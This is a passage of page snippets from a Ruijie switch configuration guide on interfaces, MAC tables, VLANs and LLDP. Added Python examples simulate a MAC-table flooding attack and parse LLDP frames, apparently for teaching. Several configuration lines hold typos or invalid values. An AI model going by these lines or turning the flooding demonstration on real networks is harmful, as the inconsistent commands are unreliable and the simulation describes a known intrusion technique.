  • Page 253 Usage Guide • Configuring the Bandwidth Command bandwidth kilobits Parameter kilobits: Indicates the interface bandwidth, ranging from 1 to the maximum Ethernet rate supported by Ruijie devices in the unit of Kbps. Description Command Interface configuration mode Mode Usage Guide...
  • Page 254 Configuration Guide Configuring Interfaces • Configuring the 802.1Q VLAN Tag Command encapsulation dot1Q VlanID Parameter VlanID: Indicates the VLAN ID, ranging from 1 to 4094. Description Command Interface configuration mode Mode Usage Guide Configuration Example • Configuring Interface Attributes Scenario Figure 1-3 •...
  • Page 255 Configuration Guide Configuring Interfaces RA(config-if)# encapsulation dot1Q 2 RA(config-if)# ip address 192.168.1.1 255.255.255.0 RA(config-if)# exit RA(config)# interface Serial 1/0 RA(config-if)# encapsulation frame-relay RA(config-if)# ip address 172.16.1.1 255.255.255.0 RA(config-if)# exit RA(config)# router rip RA(config-router)# network 192.168.1.0 RA(config-router)# network 17.16.1.0 RA(config-router)# exit Router B RB# configure terminal RB(config)# interface GigabitEthernet 0/1.1...
  • Page 256 Configuration Guide Configuring Interfaces SB(config)# ip route 0.0.0.0 255.255.255.0 VLAN 1 192.168.2.1 Perform the following operations on Switch A, Switch B, Router A, and Router B respectively: Verification • Enable Switch A to ping the IP addresses of the other three devices and ensure that the four devices can have access to each other.
  • Page 257 Configuration Guide Configuring Interfaces admin speed is AUTO, oper speed is 100M flow control admin status is OFF, flow control oper status is OFF admin negotiation mode is OFF, oper negotiation state is ON Storm Control: Broadcast is OFF, Multicast is OFF, Unicast is OFF Port-type: trunk Native vlan: 1 Allowed vlan lists: 1-4094...
  • Page 258 Configuration Guide Configuring Interfaces No IPv6 address MTU 1500 bytes, BW 2000 Kbit Encapsulation protocol is frame-relay, loopback not set Keepalive interval is 10 sec , set Carrier delay is 2 sec Queueing strategy: WFQ Rxload is 1/255,Txload is 1/255 5 minutes input rate 0 bits/sec, 0 packets/sec 5 minutes output rate 0 bits/sec, 0 packets/sec 235 packets input, 434532 bytes, 0 no buffer...
  • Page 259 Configuration Guide Configuring Interfaces MTU 1500 bytes, BW 2000 Kbit Encapsulation protocol is frame-relay, loopback not set Keepalive interval is 10 sec , set Carrier delay is 2 sec Queueing strategy: WFQ Rxload is 1/255,Txload is 1/255 5 minutes input rate 0 bits/sec, 0 packets/sec 5 minutes output rate 0 bits/sec, 0 packets/sec 235 packets input, 434532 bytes, 0 no buffer Received 0 broadcasts, 0 runts, 0 giants...
  • Page 260 Configuration Guide Configuring Interfaces 85164 Switchport attributes: interface's description:"" admin medium-type is Copper, oper medium-type is Copper lastchange time:0 Day: 0 Hour: 1 Minute: 9 Second Priority is 0 admin duplex mode is AUTO, oper duplex is Full admin speed is AUTO, oper speed is 100M flow control admin status is OFF, flow control oper status is OFF admin negotiation mode is OFF, oper negotiation state is ON Storm Control: Broadcast is OFF, Multicast is OFF, Unicast is OFF...
  • Page 261 Configuration Guide Configuring Interfaces Restarts an interface. clear interface interface-type interface-number Displaying  Displaying Interface Configuration and Status Description Command Displays the status and configuration show interfaces [ interface-type interface-number ] of an interface. Displays the time and times of link show interfaces [ interface-type interface-number ] link-state-change statistics status changes.
  • Page 262: Scenario

    Configuration Guide Configuring MAC Address 2 Configuring MAC Address 2.1 Overview A MAC address table contains the MAC addresses, interface numbers and VLAN IDs of the devices connected to the local device. When a device forwards a packet, it finds an output port from its MAC address table according to the destination MAC address and the VLAN ID of the packet.
  • Page 263 Figure 2-1 Step 1 of MAC Address Learning Figure 2-2 MAC Address Table 1 Status VLAN MAC address Interface Dynamic 00d0.f8a6.5af7 GigabitEthernet 0/2 When User B receives the packet, it sends a reply to User A through port GigabitEthernet 0/3 on the switch. Because the MAC address of User A is already in the MAC address table, the switch sends the reply as a unicast frame out of port GigabitEthernet 0/2 only, and at the same time learns the MAC address of User B on GigabitEthernet 0/3.
  • Page 264: Scenario

    Configuration Guide Configuring MAC Address 2.2.2 MAC Address Change Notification MAC address change notification provides a mechanism for the network management system (NMS) to monitor the change of devices connected to a network device. Scenario Figure 2-5 MAC Address Change Notification After MAC address change notification is enabled on a device, the device generates a notification message when the device learns a new MAC address or finishes aging a learned MAC address, and sends the message in an SNMP Trap message to a specified NMS.
  • Page 265 A device can learn only a limited number of MAC addresses, and inactive entries are removed by address aging. The aging timer of an entry starts when the address is learned and restarts each time a frame with that source MAC address is received; if no such frame arrives before the aging time expires, the entry is deleted from the MAC address table.
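As an added example (not RGOS code), the learning and aging rules described above as a small simulation of a bounded MAC address table. The capacity of 8 entries, the 300 s aging time, the addresses and the port names are assumptions chosen to keep the run short; the point is what a flood of forged source addresses does to forwarding once the legitimate entries age out, and why one port holding most of the table is the sign to look for.

```python
"""Simulation of a switch MAC address table: learning, aging and a bounded
capacity. Added example, not RGOS code; capacity, aging time and port names
are assumptions for the demonstration."""
from dataclasses import dataclass

FLOOD = "flood"  # unknown destination: frame goes out every other port in the VLAN


@dataclass
class Entry:
    port: str
    last_seen: float  # time of the last frame received from this source


class MacTable:
    def __init__(self, aging_time: float = 300.0, capacity: int = 8):
        self.aging_time = aging_time
        self.capacity = capacity
        self.entries: dict = {}  # (vlan, mac) -> Entry

    def age_out(self, now: float) -> list:
        """Delete entries whose source has been silent for aging_time or longer."""
        expired = [k for k, e in self.entries.items() if now - e.last_seen >= self.aging_time]
        for k in expired:
            del self.entries[k]
        return [mac for _, mac in expired]

    def learn(self, vlan: int, src_mac: str, in_port: str, now: float) -> bool:
        """Learn or refresh the source MAC of a received frame. Returns False when
        the table is full and a new address could not be learned."""
        self.age_out(now)
        key = (vlan, src_mac)
        if key in self.entries:
            self.entries[key] = Entry(in_port, now)  # restart the aging timer (and follow a move)
            return True
        if len(self.entries) >= self.capacity:
            return False
        self.entries[key] = Entry(in_port, now)
        return True

    def forward(self, vlan: int, dst_mac: str, now: float) -> str:
        """Output port for a destination, or FLOOD when it is unknown."""
        self.age_out(now)
        e = self.entries.get((vlan, dst_mac))
        return e.port if e else FLOOD

    def macs_per_port(self) -> dict:
        counts: dict = {}
        for e in self.entries.values():
            counts[e.port] = counts.get(e.port, 0) + 1
        return counts


def cam_overflow_demo() -> dict:
    """Constructed scenario: User A on Gi0/2 and User B on Gi0/3 exchange frames,
    then a host on Gi0/4 sends frames from 20 forged source addresses."""
    t = MacTable(aging_time=300.0, capacity=8)
    t.learn(1, "00d0.f8a6.5af7", "GigabitEthernet 0/2", now=0.0)  # User A
    t.learn(1, "00d0.f8a6.5af8", "GigabitEthernet 0/3", now=1.0)  # User B
    before = t.forward(1, "00d0.f8a6.5af7", now=2.0)
    refused = sum(
        0 if t.learn(1, f"0200.0000.{i:04x}", "GigabitEthernet 0/4", now=3.0) else 1
        for i in range(20)
    )
    # The flood cannot evict A while A's entry is young: learned entries stay until they age.
    still_known = t.forward(1, "00d0.f8a6.5af7", now=4.0)
    per_port = t.macs_per_port()  # one port holding most of the table is the tell-tale sign
    # No frame from A for aging_time: A's entry is deleted and frames to A are flooded,
    # so the port carrying the forged addresses receives them as well.
    after_aging = t.forward(1, "00d0.f8a6.5af7", now=310.0)
    return {"before": before, "refused": refused, "still_known": still_known,
            "per_port": per_port, "after_aging": after_aging}
```

The same per-port count is what `show mac-address-table dynamic interface ...` gives an operator on the real device; a user-facing port with dozens of dynamic entries deserves a look.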
  • Page 266 Specifies a physical interface or an AP port. vlan vlan-id: Displays the dynamic MAC addresses in a specific VLAN. Command Privileged EXEC mode/Global configuration mode/Interface configuration mode Mode Usage Guide Ruijie# show mac-address-table dynamic Vlan MAC Address Type Interface ----...
  • Page 267: Scenario

     Steps Delete all dynamic MAC addresses in VLAN 1 on port GigabitEthernet 0/1. Ruijie# configure terminal Ruijie(config)# mac aging-time 180 Ruijie# clear mac-address-table dynamic interface GigabitEthernet 0/1 vlan 1  Verification Check MAC address learning on an interface. ...
  • Page 268 Configuration Guide Configuring MAC Address Ruijie# show mac aging-time Aging time 180 seconds Ruijie# show mac-address-table dynamic interface GigabitEthernet 0/1 vlan 1 Vlan MAC Address Type Interface ---------- -------------------- -------- ------------------- 00d0.f800.1001 STATIC GigabitEthernet 1/1 Common Errors Configure MAC address learning on an interface before configuring the interface as a layer-2 interface, for example, a switch port or an AP port.
  • Page 269: Scenario

    Configuration Guide Configuring MAC Address Mode Usage Guide Ruijie# show mac-address-table static Vlan MAC Address Type Interface ----- ----------- -------- ------------------ 00d0.f800.1001 STATIC GigabitEthernet 1/1 00d0.f800.1002 STATIC GigabitEthernet 1/1 00d0.f800.1003 STATIC GigabitEthernet 1/1 Configuration Example  Configuring a Static MAC address In the above example, the relationship of MAC addresses, VLAN and interfaces is shown in the following table.
  • Page 270 Configuration Guide Configuring MAC Address Display the static MAC address configuration on a switch. Verification A# show mac-address-table static Vlan MAC Address Type Interface ---------- -------------------- -------- ------------------- 00d0.f800.3232.0001 STATIC GigabitEthernet 0/10 00d0.f800.3232.0002 STATIC GigabitEthernet 0/11 00d0.f800.3232.1000 STATIC GigabitEthernet 0/12 Common Errors ...
  • Page 271 Specify a destination MAC address (mac-address) for filtering.  Steps Specify the VLAN in which the MAC address resides. Ruijie# configure terminal Ruijie(config)# mac-address-table static 00d0.f800.3232.0001 vlan 1 Verification Display the filtered MAC address configuration. Ruijie# show mac-address-table filter Vlan MAC Address...
  • Page 272 Configuration Guide Configuring MAC Address community-string: Indicates an authentication name. Defaults By default, the function is disabled. Command Global configuration mode Mode Usage Guide  Enabling SNMP Trap  Optional.  Perform this configuration to send SNMP Trap messages. Command snmp-server enable traps Parameter Description...
  • Page 273 Command Privileged EXEC mode/Global configuration mode /Interface configuration mode Mode Usage Guide Usage Guide Display the configuration of global MAC address change notification. Ruijie#show mac-address-table notification MAC Notification Feature : Enabled Interval(Sec): Maximum History Size : Current History Size :...
  • Page 274: Scenario

    Configure the interval for sending MAC address change notifications to 300 seconds (1 second by default). Ruijie# configure terminal Ruijie(config)# mac-address-table notification Ruijie(config)# interface gigabitEthernet 0/2 Ruijie(config-if-GigabitEthernet 0/2)# snmp trap mac-notification added Ruijie(config-if-GigabitEthernet 0/2)# snmp trap mac-notification removed Ruijie(config-if-GigabitEthernet 0/2)# exit Ruijie(config)# snmp-server host 192.168.1.10 traps version 2c comefrom2 Ruijie(config)# snmp-server enable traps... Note that with SNMP version 2c the community string (comefrom2 in this example) is carried in clear text in every trap; treat it as a password.
  • Page 275 Display the history of MAC address change notifications. Ruijie# show mac-address-table notification MAC Notification Feature : Enabled Interval(Sec): Maximum History Size : Current History Size : Ruijie# show mac-address-table notification interface GigabitEthernet 0/2 Interface MAC Added Trap MAC Removed Trap ----------- -------------- --------------...
  • Page 276 Configuration Guide Configuring MAC Address 2.5 Monitoring Clearing Running the clear commands may lose vital information and interrupt services. Description Command Clears dynamic MAC addresses. clear mac-address-table dynamic [ address mac-address ] [ interface interface-id ] [ vlan vlan-id ] Displaying Description Command...
  • Page 277: Configuring VLAN

    Unicast, broadcast and multicast frames of Layer 2 are forwarded and transmitted within a VLAN, keeping traffic segregated. The VLANs supported by Ruijie products comply with the IEEE802.1Q standard. A maximum of 4094 VLANs (VLAN ID 1-4094) are supported, among which VLAN 1 cannot be deleted.
  • Page 278 Configuration Guide Configuring VLAN 3.4 Configuration Configuration Description and Command (Mandatory) It is used to create a VLAN. vlan Enters a VLAN ID. Configuring Basic VLAN (Optional) It is used to rename a VLAN. name Names a VLAN. 3.4.1 Configuring Basic VLAN Configuration Effect ...
  • Page 279 [ id vlan-id ] Parameter vlan-id : indicates a VLAN ID. Description Command Any mode Mode Usage Guide Command Ruijie(config-vlan)#show vlan id 20 Display VLAN Name Status Ports ---- -------------------------------- --------- ----------------------------------- 20 VLAN0020 STATIC Gi0/1 Configuration Example ...
  • Page 280 Configuration Guide Configuring VLAN VLAN Name Status Ports ---- -------------------------------- --------- ----------------------------------- 1 VLAN0001 STATIC 20 VLAN0020 STATIC Gi0/3 888 test888 STATIC 3.5 Monitoring Displaying Description Command Displays VLAN configuration. show vlan Debugging System resources are occupied when debugging information is output. Disable the debugging switch immediately after use.
  • Page 281 Configuration Guide Configuring VLAN Group 4 Configuring VLAN Group 4.1 Overview Each virtual LAN (VLAN) group contains multiple VLANs. The VLAN group function associates a wireless LAN (WLAN) with a VLAN group, achieving a 1:N mapping between them, so that VLANs can be assigned flexibly to stations (STAs) that access the WLAN. The VLAN assignment modes are as follows: ...
  • Page 282 Configuration Guide Configuring VLAN Group The STA will be authenticated in the default VLAN. After authentication succeeds, the authentication server determines whether to assign a VLAN. If yes, the packets subsequently sent by the STA will be automatically redirected to the assigned VLAN.
  • Page 283 Configuration Guide Configuring VLAN Group  Configuring a VLAN List for a VLAN Group  Mandatory. Ensure that VLANs have been created. Command vlan-list vlan-list Parameter vlan-list: indicates a VLAN list, containing a maximum of 128 VLANs. Description Defaults No VLAN list is configured. Command VLAN group configuration mode Mode...
  • Page 284 Set the VLAN assignment mode to 802.1X-based mode.  Configure a VLAN list that contains VLAN 1 to VLAN 10.  Set the default VLAN to VLAN 1. Ruijie# configure terminal Ruijie(config)# vlan-group 10 Ruijie(config-vlan-group)# vlan-assign-mode dot1x Ruijie(config-vlan-group)# vlan-list 1-10 Ruijie(config-vlan-group)# default-vlan 1 Ruijie(config-vlan-group)# end ...
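As an added example (not RGOS code), the 802.1X-based assignment mode from the configuration above, modelled in Python. The page states that the STA authenticates in the default VLAN and is moved to a server-assigned VLAN when authentication succeeds; the rule that a server-assigned VLAN is honoured only when it is a member of the group's vlan-list, with the STA otherwise staying in the default VLAN, is this example's assumption about what a safe implementation does, not a statement from the page. The RADIUS attribute names and values are those of RFC 3580; the group, list and default VLAN mirror the page's `vlan-group 10` example.

```python
"""Policy check for 802.1X-based VLAN assignment in a VLAN group. Added
example, not RGOS code. The page states that the STA authenticates in the
default VLAN and is moved to a server-assigned VLAN on success; the rule
that an assigned VLAN is honoured only when it is in the group's vlan-list
(otherwise the STA stays in the default VLAN) is this example's assumption
about what a safe implementation does."""
from dataclasses import dataclass
from typing import Optional, Set, Tuple


def parse_vlan_list(spec: str) -> Set[int]:
    """'1-10,20,30-32' -> {1..10, 20, 30, 31, 32}; the page caps a vlan-list at 128 VLANs."""
    vlans: Set[int] = set()
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue
        lo, _, hi = part.partition("-")
        lo_i, hi_i = int(lo), int(hi or lo)
        if not 1 <= lo_i <= hi_i <= 4094:
            raise ValueError(f"bad VLAN range {part!r}")
        vlans.update(range(lo_i, hi_i + 1))
    if len(vlans) > 128:
        raise ValueError("vlan-list holds at most 128 VLANs")
    return vlans


@dataclass
class VlanGroup:
    group_id: int
    mode: str              # "dot1x" for this example
    vlan_list: Set[int]
    default_vlan: int

    def __post_init__(self) -> None:
        if self.default_vlan not in self.vlan_list:
            raise ValueError("default-vlan must be a member of vlan-list")


def radius_assigned_vlan(attrs: dict) -> Optional[int]:
    """RFC 3580 VLAN assignment in an Access-Accept: Tunnel-Type = VLAN (13),
    Tunnel-Medium-Type = IEEE-802 (6), Tunnel-Private-Group-ID = VLAN id as text.
    Anything missing or inconsistent means no assignment."""
    if attrs.get("Tunnel-Type") != 13 or attrs.get("Tunnel-Medium-Type") != 6:
        return None
    gid = str(attrs.get("Tunnel-Private-Group-ID", ""))
    return int(gid) if gid.isdigit() else None


def select_vlan(group: VlanGroup, access_accept: Optional[dict]) -> Tuple[int, str]:
    """Return (vlan, reason) for a STA. access_accept is None before or without
    a successful authentication."""
    if group.mode != "dot1x":
        raise ValueError("this example only models the dot1x assignment mode")
    if access_accept is None:
        return group.default_vlan, "not authenticated: default VLAN"
    assigned = radius_assigned_vlan(access_accept)
    if assigned is None:
        return group.default_vlan, "no VLAN attributes: default VLAN"
    if assigned not in group.vlan_list:
        # Refusing an out-of-list VLAN is what stops a mis-set or hostile RADIUS reply
        # from dropping a station into a VLAN the WLAN was never meant to reach.
        return group.default_vlan, f"VLAN {assigned} not in vlan-list: default VLAN"
    return assigned, f"server-assigned VLAN {assigned}"


# Constructed group mirroring the page's example: vlan-group 10, dot1x mode,
# vlan-list 1-10, default-vlan 1.
GROUP10 = VlanGroup(10, "dot1x", parse_vlan_list("1-10"), 1)
```

The check worth keeping from this is the membership test: the vlan-list is the whole set of VLANs a WLAN may land a station in, so an Access-Accept naming a VLAN outside it should fall back rather than be trusted.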
  • Page 285 Configure the VLAN group encapsulation for wireless sub interfaces. Ruijie(config)# dot11 wlan 100 Ruijie(dot11-wlan-config)# vlan-group-id 100 Ruijie(dot11-wlan-config)# end Ruijie(config)# interface dot11radio 1/0.1 Ruijie(config-subif)# encapsulation dot1Q group 10 Ruijie(config-subif)# end Ruijie(config)# interface dot11radio 1/0 Ruijie(config-if-Dot11radio 1/0)# wlan-id 100 4.5 Monitoring Clearing...
  • Page 286 Configuration Guide Configuring VLAN Group Displaying Description Command Displays VLAN group show vlan-group [ group-id ] information. Debugging System resources are occupied when debugging information is output. Therefore, disable the debugging switch immediately after use. Description Command Debugs the VLAN group status. debug bridge vgoup...
  • Page 287: Scenario

    Administrators can quickly locate and rectify a fault based on the information. A Ruijie LLDP-compliant device is capable of discovering neighbors when the peer is either of the following: ...
  • Page 288: Scenario

    Configuring LLDP Figure 5-1 Remarks Ruijie Switch A, Switch B, and IP-Phone support LLDP and LLDP-MED. LLDP on switch ports works in TxRx mode. The LLDP transmission interval is 30 seconds and transmission delay is 2 seconds by default. Deployment ...
  • Page 289 Configuration Guide Configuring LLDP 5.3 Features Basic Concepts  LLDPDU An LLDPDU is the protocol data unit carried in an LLDP packet. Each LLDPDU is a sequence of TLV structures: three mandatory TLVs, a series of optional TLVs, and one End Of LLDPDU TLV. The following figure shows the format of an LLDPDU.
  • Page 290 Describes main functions of the device, such as the bridge, System Capabilities TLV Optional routing, and relay functions. Indicates the management address, which contains the interface Management Address TLV Optional ID and object identifier (OID). Ruijie LLDP-compliant switches support advertisement of basic management TLVs. Organizationally specific TLVs...
  • Page 291 Indicates the VLAN name of a port. Protocol Identity TLV Indicates the protocol type supported by a port. Ruijie LLDP-compliant switches do not send the Protocol Identity TLV but receive this TLV.  IEEE 802.3 organizationally specific TLVs The following table describes IEEE 802.3 organizationally specific TLVs.
  • Page 292 Indicates the module name of the MED device. Indicates the asset identifier of the MED device, used for inventory management Inventory – Asset ID TLV and asset tracking. Ruijie LLDP-compliant devices support advertisement of LLDP-MED TLVs. Overview Feature Description LLDP Work Mode Configures the mode of transmitting and receiving LLDP packets.
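As an added example (not RGOS code and not text from the standard), a parser for the LLDPDU layout described in the preceding pages, run over a constructed frame: each TLV has a 16-bit header with a 7-bit type and a 9-bit length, the PDU must open with Chassis ID, Port ID and TTL, and End Of LLDPDU closes it. The chassis MAC, port name, system name, management address and VLAN in the sample are made up. The exposure_report function is the practical point: everything a port advertises is readable by any host on that segment, which is why LLDP is usually left enabled only on ports facing other infrastructure.

```python
"""Parser for an LLDPDU (IEEE 802.1AB): a sequence of TLVs with a 16-bit
header (7-bit type, 9-bit length), opened by the three mandatory TLVs
(Chassis ID, Port ID, TTL) and closed by End Of LLDPDU. Added example, not
RGOS code; the sample frame below is constructed by hand."""
import struct
from dataclasses import dataclass

TLV_NAMES = {0: "End Of LLDPDU", 1: "Chassis ID", 2: "Port ID", 3: "TTL",
             4: "Port Description", 5: "System Name", 6: "System Description",
             7: "System Capabilities", 8: "Management Address",
             127: "Organizationally Specific"}


@dataclass
class TLV:
    type: int
    value: bytes


def parse_lldpdu(data: bytes) -> list:
    """Split an LLDPDU into TLVs, checking every length against the buffer and
    the mandatory TLV order. Raises ValueError instead of reading past the end,
    which is the classic parser bug for this kind of length-prefixed format."""
    tlvs = []
    pos = 0
    while pos + 2 <= len(data):
        hdr, = struct.unpack_from("!H", data, pos)
        ttype, length = hdr >> 9, hdr & 0x1FF
        end = pos + 2 + length
        if end > len(data):
            raise ValueError(f"TLV type {ttype} claims {length} bytes, only {len(data) - pos - 2} left")
        tlvs.append(TLV(ttype, data[pos + 2:end]))
        pos = end
        if ttype == 0:
            break
    else:
        raise ValueError("no End Of LLDPDU TLV")
    if [t.type for t in tlvs[:3]] != [1, 2, 3]:
        raise ValueError("LLDPDU must start with Chassis ID, Port ID, TTL")
    return tlvs


def decode_management_address(value: bytes) -> str:
    """Management Address TLV: address string length, address subtype, address,
    interface numbering subtype, interface number, OID length, OID."""
    addr_len, subtype = value[0], value[1]
    addr = value[2:1 + addr_len]
    if subtype == 1 and len(addr) == 4:  # IANA address family 1 = IPv4
        return ".".join(str(b) for b in addr)
    return addr.hex()


def exposure_report(data: bytes) -> dict:
    """What a passive listener on the segment learns from a single LLDPDU."""
    report = {}
    for tlv in parse_lldpdu(data):
        if tlv.type == 1 and tlv.value[0] == 4:          # chassis ID subtype 4 = MAC address
            report["chassis_mac"] = tlv.value[1:].hex(":")
        elif tlv.type == 2 and tlv.value[0] == 5:        # port ID subtype 5 = interface name
            report["port"] = tlv.value[1:].decode()
        elif tlv.type == 3:
            report["ttl"] = struct.unpack("!H", tlv.value)[0]
        elif tlv.type == 5:
            report["system_name"] = tlv.value.decode()
        elif tlv.type == 8:
            report["management_ip"] = decode_management_address(tlv.value)
        elif tlv.type == 127 and tlv.value[:4] == b"\x00\x80\xc2\x01":  # IEEE 802.1 OUI, Port VLAN ID
            report["port_vlan"] = struct.unpack("!H", tlv.value[4:6])[0]
    return report


def tlv(ttype: int, value: bytes) -> bytes:
    """Build one TLV: 7-bit type, 9-bit length, value."""
    return struct.pack("!H", (ttype << 9) | len(value)) + value


# Constructed LLDPDU, roughly what a switch port advertising its management
# address sends; all values are made up for the example.
SAMPLE_LLDPDU = b"".join([
    tlv(1, b"\x04" + bytes.fromhex("00d0f8a65af7")),                 # Chassis ID, MAC address
    tlv(2, b"\x05" + b"GigabitEthernet 0/1"),                        # Port ID, interface name
    tlv(3, struct.pack("!H", 120)),                                   # TTL = hold multiplier * interval
    tlv(5, b"Ruijie"),                                                # System Name
    tlv(8, b"\x05\x01" + bytes([192, 168, 1, 1]) + b"\x02" + struct.pack("!I", 1) + b"\x00"),
    tlv(127, b"\x00\x80\xc2\x01" + struct.pack("!H", 1)),             # 802.1 Port VLAN ID = 1
    tlv(0, b""),                                                      # End Of LLDPDU
])
```

The two ValueError paths matter as much as the happy path: a receiver that trusts the 9-bit length field without comparing it to the remaining buffer, or that accepts a PDU missing its mandatory leading TLVs, is the kind of code a malformed LLDP frame on an access port goes looking for.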
  • Page 293 Configuration Guide Configuring LLDP If the work mode is set to TxRx, the device can both transmit and receive LLDP packets. If the work mode is set to Rx Only, the device can only receive LLDP packets. If the work mode is set to Tx Only, the device can only transmit LLDP packets. If the work mode is disabled, the device cannot transmit or receive LLDP packets.
  • Page 294 Configuration Guide Configuring LLDP The default LLDP transmission interval is 30 seconds. Run the lldp timer tx-interval command to change the LLDP transmission interval. If the interval is set to a very small value, LLDP packets may be transmitted frequently. If the interval is set to a very large value, the peer may not discover the local device in time.
  • Page 295 Configuration Guide Configuring LLDP 5.4 Configuration Configuration Description and Command (Optional) It is used to enable or disable the LLDP function in global or interface Configuring LLDP configuration mode. Function lldp enable Enables the LLDP function. no lldp enable Disables the LLDP function. (Optional) It is used to configure the LLDP work mode.
  • Page 296 Configuration Guide Configuring LLDP Configuration Description and Command no lldp timer reinit-delay Restores the default initialization delay. (Optional) It is used to configure the LLDP Trap function. Enables the LLDP Trap function. lldp notification remote-change enable no lldp notification remote-change enable Disables the LLDP Trap function.
  • Page 297 Configuration Guide Configuring LLDP Configuration Description and Command no { country | state | county | city | division neighborhood street-group leading-street-dir | trailing-street-suffix | street-suffix number Deletes civic address of a device. street-number-suffix landmark additional-location-information | name | postal-code | building | unit | floor | room | type-of-place | postal-community-name | post-office-box | additional-code } ca-word (Optional) It is used to configure the emergency telephone number of a device.
  • Page 298 Usage Guide Configuration Example  Disabling the LLDP Function  Configuration Disable the LLDP function in global configuration mode. Steps Ruijie(config)#no lldp enable  Display global LLDP status. Verification Ruijie(config)#show lldp status Global status of LLDP: Disable Common Errors ...
  • Page 299  If you disable the LLDP work mode, the interface can neither receive nor transmit LLDP packets. Notes  LLDP runs on physical ports (AP member ports for AP ports). Stacked ports and VSL ports do not support LLDP. Configuration Steps ...
  • Page 300 Configuration Guide Configuring LLDP Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp mode tx Verification Display LLDP status information on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status interface gigabitethernet 0/1 Port [GigabitEthernet 0/1] Port status of LLDP : Enable Port state : UP Port encapsulation...
  • Page 301 Configuration Guide Configuring LLDP Configuration Steps  Optional.  Configure the type of TLVs to be advertised on an interface. Verification Display the configuration of TLVs to be advertised on an interface  Check whether the configuration takes effect. Related Commands ...
  • Page 302 Configuration Guide Configuring LLDP network-policy: Indicates the Network Policy TLV. profile-num: Indicates the Network Policy ID, ranging from 1 to 1,024. power-over-ethernet: Indicates the Extended Power-via-MDI TLV. Command Interface configuration mode Mode Usage Guide  Canceling TLVs Command no lldp tlv-enable {basic-tlv { all | port-description | system-capability | system-description | system-name } | dot1-tlv { all | port-vlan-id | protocol-vlan-id | vlan-name } | dot3-tlv { all | link-aggregation | mac-physic | max-frame-size | power } | med-tlv { all | capability | inventory | location...
  • Page 303 Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#no lldp tlv-enable dot1-tlv protocol-vlan-id Verification Display LLDP TLV configuration in interface configuration mode. Ruijie(config-if-GigabitEthernet 0/1)#show lldp tlv-config interface gigabitethernet 0/1 LLDP tlv-config of port [GigabitEthernet 0/1] NAME STATUS DEFAULT ------------------------------ ------ ------- Basic optional TLV:...
  • Page 304 LLDP-MED extend TLV: Capabilities TLV Network Policy TLV Location Identification TLV Extended Power via MDI TLV Inventory TLV 5.4.4 Configuring the Management Address to Be Advertised Configuration Effect  Configure the management address to be advertised in LLDP packets in interface configuration mode. ...
  • Page 305 Set the management address to 192.168.1.1 on an interface. Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp management-address-tlv 192.168.1.1 Verification Display configuration on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp local-information interface GigabitEthernet 0/1 Lldp local-information of port [GigabitEthernet 0/1] Port ID type : Interface name Port id : GigabitEthernet 0/1...
  • Page 306 Configuration Guide Configuring LLDP 802.1 organizationally information Port VLAN ID Port and protocol VLAN ID(PPVID) : 1 PPVID Supported : YES PPVID Enabled : NO VLAN name of VLAN 1 : VLAN0001 Protocol Identity 802.3 organizationally information Auto-negotiation supported : YES Auto-negotiation enabled : YES PMD auto-negotiation advertised...
  • Page 307  Configuring the LLDP Fast Transmission Count Set the LLDP fast transmission count to 5 in global configuration mode. Configuration Steps Ruijie(config)#lldp fast-count 5 Verification Display the global LLDP status information. Ruijie(config)#show lldp status Global status of LLDP : Enable...
  • Page 308 Configuration Guide Configuring LLDP Transmit interval : 30s Hold multiplier Reinit delay : 2s Transmit delay : 2s Notification interval : 5s Fast start counts 5.4.6 Configuring the TTL Multiplier and Transmission Interval Configuration Effect  Configure the TTL multiplier. ...
  • Page 309 Set the TTL multiplier to 3 and the transmission interval to 20 seconds. The TTL of local device information on neighbors is then 3 x 20 + 1 = 61 seconds. Configuration Steps Ruijie(config)#lldp hold-multiplier 3 Ruijie(config)#lldp timer tx-interval 20 Verification Display the global LLDP status information. Ruijie(config)#show lldp status...
  • Page 310 Configuration Guide Configuring LLDP Reinit delay : 2s Transmit delay : 2s Notification interval : 5s Fast start counts 5.4.7 Configuring the Transmission Delay Configuration Effect  Configure the delay time for LLDP packet transmission. Configuration Steps  Optional.  Perform the configuration in global configuration mode.
  • Page 311 Configuration Example  Configuring the Transmission Delay Set the transmission delay to 3 seconds. Configuration Steps Ruijie(config)#lldp timer tx-delay 3 Verification Display the global LLDP status information. Ruijie(config)#show lldp status Global status of LLDP : Enable Neighbor information last changed time :...
  • Page 312 Configuration Example  Configuring the Initialization Delay Configuration Set the initialization delay to 3 seconds. Steps Ruijie(config)#lldp timer reinit-delay 3 Verification Display the global LLDP status information. Ruijie(config)#show lldp status Global status of LLDP : Enable Neighbor information last changed time :...
  • Page 313 Configuration Guide Configuring LLDP 5.4.9 Configuring the LLDP Trap Function Configuration Effect  Configure the interval for transmitting LLDP Trap messages. Configuration Steps  Enabling the LLDP Trap Function  Optional.  Perform the configuration in interface configuration mode.  Configuring the LLDP Trap Transmission Interval ...
  • Page 314 Enable the LLDP Trap function and set the LLDP Trap transmission interval to 10 seconds. Steps Ruijie(config)#lldp timer notification-interval 10 Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp notification remote-change enable Verification Display LLDP status information. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status Global status of LLDP...
  • Page 315 Configuration Guide Configuring LLDP Fast start counts ------------------------------------------------------------ Port [GigabitEthernet 0/1] ------------------------------------------------------------ Port status of LLDP : Enable Port state : UP Port encapsulation : Ethernet II Operational mode : RxAndTx Notification enable : YES Error detect enable : YES Number of neighbors Number of MED neighbors 5.4.10 Configuring the LLDP Error Detection Function...
  • Page 316 Enable the LLDP error detection function on interface GigabitEthernet 0/1. Configuration Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp error-detect Verification Display LLDP status information on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status interface gigabitethernet 0/1 Port [GigabitEthernet 0/1] Port status of LLDP : Enable Port state : UP Port encapsulation...
